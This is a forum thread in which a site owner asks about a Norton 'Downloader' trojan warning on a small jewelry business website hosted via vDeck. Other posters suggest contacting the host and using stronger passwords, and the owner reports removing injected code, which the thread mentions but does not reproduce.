So a few years back I (very sloppily) made a website for my mom's jewelry business (ronnaround.com, but don't visit just yet). Recently, like yesterday, people have started telling her that when they go to her website, Norton Anti-virus blocks "Downloader" which according to the Norton website is an old trojan that tries to download crap.
So that's great. I manage the website through ipower's control panel, which is powered by "vDeck." I can see a directory tree of every file on the website and I don't see anything that looks like a trojan. I don't see how a trojan could have gotten on to the website, because I thought I was the only one allowed to upload stuff to it.
There are some folders that I did not put there and that have not been there since day 1, but they look like they're official vDeck stuff. One is named "cgi-bin" and it has an empty folder inside named "tmp," one is named "formbuilder" which has a folder named "web" which has one named "forms" which has a small .html file that basically says "thank you for filling out the form" named "thanks.html." Finally there's a folder named "v-web" that has a folder named "images" which is empty and a folder named "errdocs" which has various html pages that are 40X errors with the vDeck logo.
I am reluctant to delete these folders since they might be some sort of vDeck thing, and in any case I don't see how there's a trojan hiding in them. On the other hand I know just about nothing about the distribution side of viruses so there's that. Can it be piggybacking on some .html file or image file I uploaded? Could it have been implanted there without my knowledge one day by a robot/hacker or something? How do I get rid of it? Is there even a virus on the page?
Posts
Call them up and request a tech; be prepared to have a two hour phone call depending on how their support flow is going. Have the tech log into the server itself and search for hidden files and help you find the potential problem.
Are any other internet viewers with popup block or any other antivirus programs seeing this as well, or just Norton? If it's just Norton, it could be an error somewhere in your code for the site causing the problem. Do you have Flash graphics, or a link to Adobe Flash Player? That downloader could be causing the problem.
I'll call Ipower when I get a chance. Thanks for the help.
This is at the bottom of your page.
This translates into:
The question now is, how did it get there? I checked the copy of it that I have on my computer, and the code is there, but I recently downloaded it from the copy online so my guess is that it snuck there not from my computer but from somewhere else. I purged the offending code and reuploaded it, and the bad stuff has not reappeared (in the first 15 seconds at least). So I'll keep an eye out for it, and this is good because the problem is sort of solved, but if anyone knows anything about how this stuff happens I'm curious.
edit: also, the CSS points to a local file on K:.
Glad to hear it's not reappearing. It was most likely a one-time event, but do as everyone else suggests and create a strong password with many case variants, symbols, letters, and numbers. Most likely this was some sort of vDeck vulnerability.
Edit:
Linux is great for troubleshooting these things sometimes.